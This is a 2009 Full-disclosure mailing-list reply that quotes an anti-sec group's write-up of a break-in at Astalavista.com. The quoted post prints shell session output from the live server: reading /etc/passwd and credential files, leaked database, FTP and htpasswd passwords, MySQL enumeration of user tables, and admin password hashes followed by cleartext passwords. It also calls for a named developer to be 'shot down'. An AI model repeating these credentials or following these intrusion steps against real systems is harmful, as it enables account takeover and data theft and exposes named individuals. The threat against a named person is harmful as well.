[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Astalavista.com Exposed
- To: srshaxsir@xxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Astalavista.com Exposed
- From: Charles Majola <charles.lists@xxxxxxxxx>
- Date: Mon, 8 Jun 2009 14:39:58 +0200
Good lord man, have they fixed this yet?
On Fri, Jun 5, 2009 at 3:58 AM, <srshaxsir@xxxxxxxxxxxx> wrote:
> Astalavista.com
> Astalavista.net
> The Hacking & Security Community
> [+] Founded in 1997 by a hacker computer enthusiast
> [-] Exposed in 2009 by anti-sec group
>
> From <http://astalavista.com/faq>:
> >> 03. Who's behind the site?
> >>
> >> A team of security and IT professionals, and a countless number
> of contributors from all over the world.
>
> >> 05. Is it true that the site is visited by script-kiddies and
> warez fans only?
> >>
> >> Absolutely not! The audience behind the site consists of home
> users, worldwide companies and corporations, educational and non-
> profit organizations, government and military institutions.
> >> All of these have been visiting the site on a daily basis for
> the past couple of years, contributing in various ways, or
> requesting services and information.
>
> Why has Astalavista been targeted?
>
> Other than the fact that they are not doing any of this for the
> "community" but
> for the money, they spread exploits for kids, claim to be a
> security community
> (with no real sense of security on their own servers), and they
> charge you $6.66
> per months to access a dead forum with a directory filled with
> public releases
> and outdated / broken services.
>
> We wanted to see how good that "team of security and IT
> professionals" really is.
>
> Let's begin.
>
> anti-sec:~# ./g0tshell astalavista.com -p 80
> [+] Connecting to astalavista.com:80
> [+] Grabbing banner...
> LiteSpeed
> [+] Injecting shellcode...
> [-] Wait for it
>
> [~] We g0tshell
> uname -a: Linux asta1.astalavistaserver.com2.6.18-128.1.10.el5
> #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
> ID: uid=100(apache) gid=500(apache) groups=500(apache)
>
> sh-3.2$ cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
> bin:x:1:1:bin:/bin:/sbin/nologin
> daemon:x:2:2:daemon:/sbin:/sbin/nologin
> adm:x:3:4:adm:/var/adm:/sbin/nologin
> lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
> sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/halt
> mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
> news:x:9:13:news:/etc/news:
> uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
> operator:x:11:0:operator:/root:/sbin/nologin
> games:x:12:100:games:/usr/games:/sbin/nologin
> gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
> ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
> nobody:x:99:99:Nobody:/:/sbin/nologin
> rpm:x:37:37::/var/lib/rpm:/sbin/nologin
> dbus:x:81:81:System message bus:/:/sbin/nologin
> nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
> mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
> smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
> vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
> haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
> rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
> rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
> nfsnobody:x:4294967294:4294967294:Anonymous NFS
> User:/var/lib/nfs:/sbin/nologin
> sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
> pcap:x:77:77::/var/arpwatch:/sbin/nologin
> named:x:25:25:Named:/var/named:/sbin/nologin
> apache:x:100:500::/var/www:/bin/false
> diradmin:x:101:101::/usr/local/directadmin:/bin/bash
> mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
> webapps:x:500:501::/var/www/html:/bin/bash
> majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
> admin:x:501:502::/home/admin:/bin/bash
> jon:x:502:503::/home/jon:/bin/bash
> com:x:503:504::/home/com:/bin/bash
> ntp:x:38:38::/etc/ntp:/sbin/nologin
> ais:x:39:39:openais Standards Based Cluster
> Framework:/:/sbin/nologin
> astanet:x:504:505::/home/astanet:/bin/bash
> avahi:x:70:70:Avahi daemon:/:/sbin/nologin
> avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-
> autoipd:/sbin/nologin
>
> sh-3.2$ cat /etc/hosts
> # Do not remove the following line, or various programs
> # that require network functionality will fail.
> 127.0.0.1 localhost.localdomain localhost
> ::1 localhost6.localdomain6 localhost6
> 80.74.154.172 asta1.astalavistaserver.com
>
> sh-3.2$ pwd
> /home/com/public_html
>
> sh-3.2$ ls -la
> total 18460
> drwxr-xr-x 30 com apache 4096 May 28 17:06 .
> drwx--x--x 11 com com 4096 Jun 25 2008 ..
> drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
> drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
> drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
> drwxrwxrwx 2 com com 4096 May 19 00:50 config
> drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
> drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
> drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
> drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
> drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
> -rw-r--r-- 1 com com 8035 May 19 14:26
> directory_to_mediadir.php
> drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
> drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
> -rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico
> drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
> -rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
> -rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-
> 21.bak
> -rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-
> 11.bak
> drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
> drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
> -rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php
> drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
> drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
> drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
> drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
> drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
> drwxr-xr-x 34 com com 4096 May 28 16:30 modules
> drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
> drwxrwxr-x 22 com com 4096 May 28 17:06 _new
> drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
> drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
> drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
> -rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt
> -rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
> -rw-r--r-- 1 com com 223 Mar 30 15:32 test.php
> drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
> drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
> drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
>
> sh-3.2$ head -20 index.php
> <?php
>
> /**
> * The main page for the CMS
> * @copyright CONTREXX CMS - COMVATION AG
> * @author Comvation Development Team
> * @version v1.0.9.10.1 stable
> * @package contrexx
> * @subpackage core
> * @link http://www.contrexx.com/ contrexx homepage
> * @since v0.0.0.0
> * @todo Capitalize all class names in project
> * @uses /config/configuration.php
> * @uses /config/settings.php
> * @uses /config/version.php
> * @uses /core/API.php
> * @uses /core_modules/cache/index.class.php
> * @uses /core/error.class.php
> * @uses /core_modules/banner/index.class.php
> * @uses /core_modules/contact/index.class.php
>
> sh-3.2$ cd config/
> sh-3.2$ ls -la
> total 32
> drwxrwxrwx 2 com com 4096 May 19 00:50 .
> drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
> -rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
> -rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
> -rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
> -rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
>
> sh-3.2$ cat configuration.php
> [snip]
> $_DBCONFIG['host'] = 'localhost'; // This is normally set to
> localhost
> $_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
> $_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
> $_DBCONFIG['user'] = 'contrexxuser2'; // Database username
> $_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
> $_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g.
> mysql,postgres ..)
> $_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8,
> ..)
> [snip]
> $_FTPCONFIG['is_activated'] = true; // Ftp support true or false
> $_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
> $_FTPCONFIG['host'] = 'localhost';// This is normally set to
> localhost
> $_FTPCONFIG['port'] = 21; // Ftp remote port
> $_FTPCONFIG['username'] = 'dev@xxxxxxxxxxxxxxx'; // Ftp login
> username
> $_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
> $_FTPCONFIG['path'] = '/'; // Ftp path to cms
>
> sh-3.2$ cd ..
> sh-3.2$ cd dvd/
> sh-3.2$ ls -la
> total 2913780
> drwxr-xr-x 2 com com 4096 Sep 9 2008 .
> drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
> -rw-r--r-- 1 com com 1050061483 May 16 2008
> astalavista_security_toolbox_dvd_2008.part1.rar
> -rw-r--r-- 1 com com 1050061483 May 16 2008
> astalavista_security_toolbox_dvd_2008.part2.rar
> -rw-r--r-- 1 com com 880644069 May 16 2008
> astalavista_security_toolbox_dvd_2008.part3.rar
> -rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess
>
> sh-3.2$ cat .htaccess
> authType Basic
> authName DVD
> authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
> require valid-user
>
> sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
> DVDdownload:CRD8cuY6.MPT6
> DVDdownload2:CR8a36.wluFMg
>
> sh-3.2$ cat test.php
> <?php
> $url =
> 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc
> 0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
> $url = str_replace(array('&', '&'), '&',
> base64_decode(rawurldecode($url)));
> echo $url;
> ?>
>
> sh-3.2$ cd modifications/
> sh-3.2$ ls -la
> total 32
> drwxr-xr-x 8 com com 4096 May 11 12:48 .
> drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
> drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
> drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
> drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
> drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
> drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
> drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
>
> sh-3.2$ ls -R
> .:
> com_avtng cronjobs onlinetools pjirc search _tmp
>
> ./com_avtng:
> avtng.php banner_bottom.inc.php banner_button.inc.php
> banner_content.inc.php banner_popunder.inc.php
> banner_right.inc.php banner_top.inc.php iframe.php scripts
>
> ./com_avtng/scripts:
> popunder.js
>
> ./cronjobs:
> exploits.php exploits.sh google_blogindexing.php ip2country.sh
> proxydb2.php proxydb.php securitynews.php tmp
>
> ./cronjobs/tmp:
> contrexx_module_onlinetools_defaultports.csv
> contrexx_module_onlinetools_geolitecity_country.csv
>
> ./onlinetools:
> index.php
>
> ./pjirc:
> a_big.jpg english.lng img irc.jar
> NormalApplet.html pixx-french.lng pjirc.cfg securedirc-
> unsigned.cab thanks.txt
> AppletWithJS.html french.lng IRCApplet.class irc-
> unsigned.jar pixx.cab pixx.jar readme.txt
> SimpleApplet.html versions.txt
> background.gif HeavyApplet.html irc.cab license.txt
> pixx-english.lng pixx-readme.txt securedirc.cab snd
>
> ./pjirc/img:
> ange.gif bombe.gif clin-oeuil.gif content.gif
> enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif
> portable.gif sapin.gif triste.gif
> arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif
> femme.gif grognon.gif lettre.gif newbie.gif pere-
> noel.gif pouce-non.gif sleep.gif verre-eau.gif
> argh.gif bouqin.gif coeur-brise.gif diable.gif
> fille.gif halloween.gif lit.gif OH-1.gif pleure.gif
> pouce-oui.gif soleil.gif verre-vin.gif
> ballon.gif cadeau.gif coeur.gif dwchat.gif
> fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif
> roll-eyes.gif sourire.gif yinyang.gif
> biere.gif chien.gif comprends-pas.gif enerve1.gif
> fume.gif homme.gif lune.gif OH-3.gif pomme.gif
> rouge.gif terre.gif
>
> ./pjirc/snd:
> bell2.au ding.au
>
> ./search:
> searchEngines.php search.php
>
> ./_tmp:
> defaultPorts.php defaultPorts.txt
>
> sh-3.2$ cd cronjobs/
> sh-3.2$ cat exploits.php
> [snip]
> $categories = array();
> $milw0rmFile = FULLPATH .
> '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
> $expolits = file($milw0rmFile);
> $comExploits = array();
> [snip]
> // manage data
> for ($x = 0; $x < count($expolits); $x++){ // count($expolits) -
> 2640
>
> // get path and title
> $expolits[$x] = trim($expolits[$x]);
> $path = str_replace('./', FULLPATH .
> '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0,
> strpos($expolits[$x], ' ')));
> $title = htmlspecialchars(substr($expolits[$x],
> strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
>
> // check if file exists
> if (file_exists($path)) {
>
> $text = file_get_contents($path);
>
> // get content and date
> //$text = htmlspecialchars($text, ENT_QUOTES);
> $tmptext = addslashes(htmlentities($text, ENT_QUOTES, "UTF-
> 8"));
> if ($tmptext != '') {
> $text = $tmptext;
> } else {
> $text = addslashes(htmlentities($text, ENT_QUOTES));
> }
> $date = str_replace('milw0rm.com [', '', str_replace(']',
> '', strstr($text, 'milw0rm.com [')));
> $tmp = explode('-', $date);
> $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]),
> trim($tmp[0]));
> $cat = getCategory ($path);
> $ext = pathinfo(basename($path));
> $ext = $ext['extension'];
> $qStr = "
> SELECT `id`
> FROM `contrexx_module_exploits`
> WHERE `title` = '" . $title . "'
> AND `date` = '" . $date . "'
> ";
> echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr .
> "\n";
> $q = $_objDB->query($qStr);
>
> if ($q->numRows() == 0) {
>
> // prepare array
> $comExploits[$x]['date'] = $date;
> $comExploits[$x]['title'] = $title;
> $comExploits[$x]['author'] = 'milw0rm';
> $comExploits[$x]['text'] = $text;
> $comExploits[$x]['source'] = $ext;
> $comExploits[$x]['url1'] = '';
> $comExploits[$x]['url2'] = '';
> $comExploits[$x]['catid'] = $cat;
> $comExploits[$x]['lang'] = '2';
> $comExploits[$x]['userid'] = '12';
> $comExploits[$x]['startdate'] = '0000-00-00';
> $comExploits[$x]['enddate'] = '0000-00-00';
> $comExploits[$x]['status'] = '1';
> $comExploits[$x]['changelog'] = $date;
>
> }
> [snip]
> $xml = '<?xml version="1.0" encoding="UTF-8"?>
> <rss version="2.0">
> <channel>
> <title>ASTALAVISTA.com - Exploits</title>
> <link>http://www.astalavista.com/exploits</link>
> <description>All availably Exploits.</description>
> <language>en-us</language>
> <lastBuildDate>' . date('F, j M Y H:i:s O') .
> '</lastBuildDate>
> <docs>http://blogs.law.harvard.edu/tech/rss</docs>
> <generator>Astalavista.com</generator>
> <webMaster>info@xxxxxxxxxxxxxxx</webMaster>' . $items . '
> </channel>
> </rss>';
>
>
> if (file_exists(FULLPATH . '/feed/exploits.xml')) {
> unlink (FULLPATH . '/feed/exploits.xml');
> }
>
>
> file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
> [snip]
>
> sh-3.2$ cat exploits.sh
> #!/bin/sh
>
> ###########################################################
> # #
> # Title: milw0rm exploits adder #
> # Description: Add all milw0rm exploits to the #
> # Astalavista.com database #
> # #
> # Company: Astalavista Group #
> # Author: Paulo M. Santos #
> # E-Mail: paulo.santos@xxxxxxxxxxxxxx #
> # #
> ###########################################################
>
>
> # path
> this_path=/home/com/public_html/modifications/cronjobs
>
> # change directory
> cd $this_path
> cd tmp/
>
> # delete files
> rm -rf milw0rm.tar.* &
> rm -rf milw0rm/ &
>
> # wget milw0rm paket
> wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
>
> # extract milw0rm paket
> tar -xvf milw0rm.tar.bz2
>
> # change owner
> chown -R com .
> chgrp -R com .
>
> # execute php script
> cd $this_path
> php -q exploits.php
>
> # delete files
> rm -rf tmp/milw0rm.tar.*
> rm -rf tmp/milw0rm/
>
> sh-3.2$ echo "Paulo M. Santos needs to be shot down."
> Paulo M. Santos needs to be shot down.
>
> mysql -u contrexxuser2 -p
> Enter password:
> Welcome to the MySQL monitor. Commands end with ; or \g.
> Your MySQL connection id is 261694
> Server version: 5.0.45-community-log MySQL Community Edition (GPL)
>
> Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
>
> mysql> show databases;
> +--------------------+
> | Database |
> +--------------------+
> | information_schema |
> | com_contrexx2 |
> | com_contrexx2_live |
> | test |
> +--------------------+
> 4 rows in set (0.00 sec)
>
> mysql> use com_contrexx2_live
> Database changed
> mysql> show tables;
> +--------------------------------------------------+
> | Tables_in_com_contrexx2_live |
> +--------------------------------------------------+
> | cc_banner_counter |
> | cc_search_counter |
> | contrexx_access_group_dynamic_ids |
> | contrexx_access_group_static_ids |
> | contrexx_access_rel_user_group |
> | contrexx_access_settings |
> | contrexx_access_user_attribute |
> | contrexx_access_user_attribute_name |
> | contrexx_access_user_attribute_value |
> | contrexx_access_user_core_attribute |
> | contrexx_access_user_groups |
> | contrexx_access_user_mail |
> | contrexx_access_user_profile |
> | contrexx_access_user_title |
> | contrexx_access_user_validity |
> | contrexx_access_users |
> | contrexx_backend_areas |
> | contrexx_backups |
> | contrexx_content |
> | contrexx_content_history |
> | contrexx_content_logfile |
> | contrexx_content_navigation |
> | contrexx_content_navigation_history |
> | contrexx_ids |
> | contrexx_languages |
> | contrexx_lib_country |
> | contrexx_log |
> | contrexx_module_alias_source |
> | contrexx_module_alias_target |
> | contrexx_module_block_blocks |
> | contrexx_module_block_rel_lang |
> | contrexx_module_block_rel_pages |
> | contrexx_module_block_settings |
> | contrexx_module_blog_categories |
> | contrexx_module_blog_comments |
> | contrexx_module_blog_message_to_category |
> | contrexx_module_blog_messages |
> | contrexx_module_blog_messages_lang |
> | contrexx_module_blog_networks |
> | contrexx_module_blog_networks_lang |
> | contrexx_module_blog_settings |
> | contrexx_module_blog_votes |
> | contrexx_module_calendar |
> | contrexx_module_calendar_access |
> | contrexx_module_calendar_categories |
> | contrexx_module_calendar_form_data |
> | contrexx_module_calendar_form_fields |
> | contrexx_module_calendar_registrations |
> | contrexx_module_calendar_settings |
> | contrexx_module_calendar_style |
> | contrexx_module_contact_form |
> | contrexx_module_contact_form_data |
> | contrexx_module_contact_form_field |
> | contrexx_module_contact_settings |
> | contrexx_module_data_categories |
> | contrexx_module_data_message_to_category |
> | contrexx_module_data_messages |
> | contrexx_module_data_messages_lang |
> | contrexx_module_data_placeholders |
> | contrexx_module_data_settings |
> | contrexx_module_directory_access |
> | contrexx_module_directory_categories |
> | contrexx_module_directory_dir |
> | contrexx_module_directory_inputfields |
> | contrexx_module_directory_levels |
> | contrexx_module_directory_mail |
> | contrexx_module_directory_rel_dir_cat |
> | contrexx_module_directory_rel_dir_level |
> | contrexx_module_directory_settings |
> | contrexx_module_directory_settings_google |
> | contrexx_module_directory_vote |
> | contrexx_module_docsys |
> | contrexx_module_docsys_categories |
> | contrexx_module_egov_configuration |
> | contrexx_module_egov_orders |
> | contrexx_module_egov_product_calendar |
> | contrexx_module_egov_product_fields |
> | contrexx_module_egov_products |
> | contrexx_module_egov_settings |
> | contrexx_module_exploits |
> | contrexx_module_exploits_categories |
> | contrexx_module_feed_category |
> | contrexx_module_feed_news |
> | contrexx_module_feed_newsml_association |
> | contrexx_module_feed_newsml_categories |
> | contrexx_module_feed_newsml_documents |
> | contrexx_module_feed_newsml_providers |
> | contrexx_module_forum_access |
> | contrexx_module_forum_categories |
> | contrexx_module_forum_categories_lang |
> | contrexx_module_forum_notification |
> | contrexx_module_forum_postings |
> | contrexx_module_forum_rating |
> | contrexx_module_forum_settings |
> | contrexx_module_forum_statistics |
> | contrexx_module_gallery_categories |
> | contrexx_module_gallery_comments |
> | contrexx_module_gallery_language |
> | contrexx_module_gallery_language_pics |
> | contrexx_module_gallery_pictures |
> | contrexx_module_gallery_settings |
> | contrexx_module_gallery_votes |
> | contrexx_module_guestbook |
> | contrexx_module_guestbook_settings |
> | contrexx_module_livecam |
> | contrexx_module_livecam_settings |
> | contrexx_module_market |
> | contrexx_module_market_access |
> | contrexx_module_market_categories |
> | contrexx_module_market_mail |
> | contrexx_module_market_paypal |
> | contrexx_module_market_settings |
> | contrexx_module_market_spez_fields |
> | contrexx_module_mediadir_access |
> | contrexx_module_mediadir_categories |
> | contrexx_module_mediadir_comments |
> | contrexx_module_mediadir_dir |
> | contrexx_module_mediadir_inputfields |
> | contrexx_module_mediadir_levels |
> | contrexx_module_mediadir_mail |
> | contrexx_module_mediadir_rel_dir_cat |
> | contrexx_module_mediadir_rel_dir_level |
> | contrexx_module_mediadir_reports |
> | contrexx_module_mediadir_settings |
> | contrexx_module_mediadir_settings_google |
> | contrexx_module_mediadir_vote |
> | contrexx_module_memberdir_directories |
> | contrexx_module_memberdir_name |
> | contrexx_module_memberdir_settings |
> | contrexx_module_memberdir_values |
> | contrexx_module_nettools_allowed_groups |
> | contrexx_module_nettools_settings |
> | contrexx_module_news |
> | contrexx_module_news_access |
> | contrexx_module_news_categories |
> | contrexx_module_news_settings |
> | contrexx_module_news_teaser_frame |
> | contrexx_module_news_teaser_frame_templates |
> | contrexx_module_news_ticker |
> | contrexx_module_newsletter |
> | contrexx_module_newsletter_attachment |
> | contrexx_module_newsletter_category |
> | contrexx_module_newsletter_confirm_mail |
> | contrexx_module_newsletter_rel_cat_news |
> | contrexx_module_newsletter_rel_user_cat |
> | contrexx_module_newsletter_settings |
> | contrexx_module_newsletter_template |
> | contrexx_module_newsletter_tmp_sending |
> | contrexx_module_newsletter_user |
> | contrexx_module_newsletter_user_title |
> | contrexx_module_onlinetools_defaultports |
> | contrexx_module_onlinetools_defaultports_back |
> | contrexx_module_onlinetools_geolitecity_blocks |
> | contrexx_module_onlinetools_geolitecity_country |
> | contrexx_module_onlinetools_geolitecity_location |
> | contrexx_module_podcast_category |
> | contrexx_module_podcast_medium |
> | contrexx_module_podcast_rel_category_lang |
> | contrexx_module_podcast_rel_medium_category |
> | contrexx_module_podcast_settings |
> | contrexx_module_podcast_template |
> | contrexx_module_proxydb |
> | contrexx_module_recommend |
> | contrexx_module_repository |
> | contrexx_module_securitynews_cats |
> | contrexx_module_securitynews_feeds |
> | contrexx_module_securitynews_news |
> | contrexx_module_shop_categories |
> | contrexx_module_shop_config |
> | contrexx_module_shop_countries |
> | contrexx_module_shop_currencies |
> | contrexx_module_shop_customers |
> | contrexx_module_shop_importimg |
> | contrexx_module_shop_lsv |
> | contrexx_module_shop_mail |
> | contrexx_module_shop_mail_content |
> | contrexx_module_shop_manufacturer |
> | contrexx_module_shop_order_items |
> | contrexx_module_shop_order_items_attributes |
> | contrexx_module_shop_orders |
> | contrexx_module_shop_payment |
> | contrexx_module_shop_payment_processors |
> | contrexx_module_shop_pricelists |
> | contrexx_module_shop_products |
> | contrexx_module_shop_products_attributes |
> | contrexx_module_shop_products_attributes_name |
> | contrexx_module_shop_products_attributes_value |
> | contrexx_module_shop_products_downloads |
> | contrexx_module_shop_rel_countries |
> | contrexx_module_shop_rel_payment |
> | contrexx_module_shop_rel_shipment |
> | contrexx_module_shop_shipment_cost |
> | contrexx_module_shop_shipper |
> | contrexx_module_shop_vat |
> | contrexx_module_shop_zones |
> | contrexx_module_u2u_address_list |
> | contrexx_module_u2u_message_log |
> | contrexx_module_u2u_sent_messages |
> | contrexx_module_u2u_settings |
> | contrexx_module_u2u_user_log |
> | contrexx_modules |
> | contrexx_sessions |
> | contrexx_settings |
> | contrexx_settings_smtp |
> | contrexx_skins |
> | contrexx_stats_browser |
> | contrexx_stats_colourdepth |
> | contrexx_stats_config |
> | contrexx_stats_country |
> | contrexx_stats_hostname |
> | contrexx_stats_javascript |
> | contrexx_stats_operatingsystem |
> | contrexx_stats_referer |
> | contrexx_stats_requests |
> | contrexx_stats_requests_summary |
> | contrexx_stats_screenresolution |
> | contrexx_stats_search |
> | contrexx_stats_spiders |
> | contrexx_stats_spiders_summary |
> | contrexx_stats_visitors |
> | contrexx_stats_visitors_summary |
> | contrexx_voting_additionaldata |
> | contrexx_voting_email |
> | contrexx_voting_rel_email_system |
> | contrexx_voting_results |
> | contrexx_voting_system |
> | foo |
> +--------------------------------------------------+
> 227 rows in set (0.01 sec)
>
> mysql> select count(*) as skids from contrexx_access_users;
> +-------+
> | skids |
> +-------+
> | 53699 |
> +-------+
> 1 row in set (0.00 sec)
>
> mysql> describe contrexx_access_users;
> +------------------+------------------------------------------+-----
> -+-----+--------------+----------------+
> | Field | Type |
> Null | Key | Default | Extra |
> +------------------+------------------------------------------+-----
> -+-----+--------------+----------------+
> | id | int(10) unsigned | NO
> | PRI | NULL | auto_increment |
> | is_admin | tinyint(1) unsigned | NO
> | | 0 | |
> | username | varchar(40) | YES
> | MUL | NULL | |
> | password | varchar(32) | YES
> | | NULL | |
> | regdate | int(14) unsigned | NO
> | | 0 | |
> | expiration | int(14) unsigned | NO
> | | 0 | |
> | validity | int(10) unsigned | NO
> | | 0 | |
> | last_auth | int(14) unsigned | NO
> | | 0 | |
> | last_activity | int(14) unsigned | NO
> | | 0 | |
> | email | varchar(255) | YES
> | | NULL | |
> | email_access | enum('everyone','members_only','nobody') | NO
> | | nobody | |
> | frontend_lang_id | int(2) unsigned | NO
> | | 0 | |
> | backend_lang_id | int(2) unsigned | NO
> | | 0 | |
> | active | tinyint(1) | NO
> | | 0 | |
> | profile_access | enum('everyone','members_only','nobody') | NO
> | | members_only | |
> | restore_key | varchar(32) | NO
> | | | |
> | restore_key_time | int(14) unsigned | NO
> | | 0 | |
> | u2u_active | enum('0','1') | NO
> | | 1 | |
> +------------------+------------------------------------------+-----
> -+-----+--------------+----------------+
> 18 rows in set (0.00 sec)
>
> mysql> select username,password,email from contrexx_access_users
> where is_admin = 1;
> +------------+----------------------------------+-------------------
> ----------+
> | username | password | email
> |
> +------------+----------------------------------+-------------------
> ----------+
> | system | 0defe9e458e745625fffbc215d7801c5 |
> info@xxxxxxxxxxxxx |
> | prozac | 1f65f06d9758599e9ad27cf9707f92b5 |
> prozac@xxxxxxxxxxxxxxx |
> | Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a |
> paulo.santos@xxxxxxxxxxxxxx |
> | schmid | 0defe9e458e745625fffbc215d7801c5 |
> ivan.schmid@xxxxxxxxxxxxx |
> +------------+----------------------------------+-------------------
> ----------+
> 4 rows in set (0.04 sec)
>
> mysql> exit;
> Bye
>
> [~] There you go, your "team of security and IT professionals" is a
> joke.
>
> +------------------------------+
> system:f82BN3+_*
> Be1er0ph0r:belerophor4astacom
> prozac:asta4cms!
> commander:mpbdaagf6m
> sykadul:ak29eral
> +------------------------------+
>
> [~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his
> milw0rm ripping script(s)
> ...and the others, find another area to get paid from, security
> isn't for sale and you obviously fail at it.
>
> [~] Lets move to astalavista.net now,
>
> From <https://www.astalavista.net/>:
> >> Everyone knows that the best defense is a good offense.
> >> Those who wait for their foes to find a security loophole are
> opting for the wrong strategy.
> >> The ASTALAVISTA hacking & security community is the largest IT
> security community in the world.
> >> It’s a platform for both IT specialists and novices, and anyone
> interested in expanding and updating their knowledge regarding IT
> security and hacking."
>
> >> Go ahead, try and hack our server Ð in a completely legal way!
> >> Learn by doing: We offer our members tricky tasks and challenges
> on an
> >> ongoing basis so you can test your knowledge and abilities. You
> can also
> >> demonstrate what youÕve mastered by taking part in regular
> hacker contests
> >> and war games
>
> [~] Lets take a look there, after all... they are hack-proof,
> aren't they?!
>
> [-] Tricky task: Find home dir of astalavista.net
>
> sh-3.2$ ls -la ~astanet
> total 48
> drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 .
> drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
> drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
> -rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
> -rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
> -rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
> -rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
> drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
> drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
> drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
> lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html ->
> ./domains/astalavista.net/public_html
> -rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow
>
> sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
> sh-3.2$ ls -la
> total 200
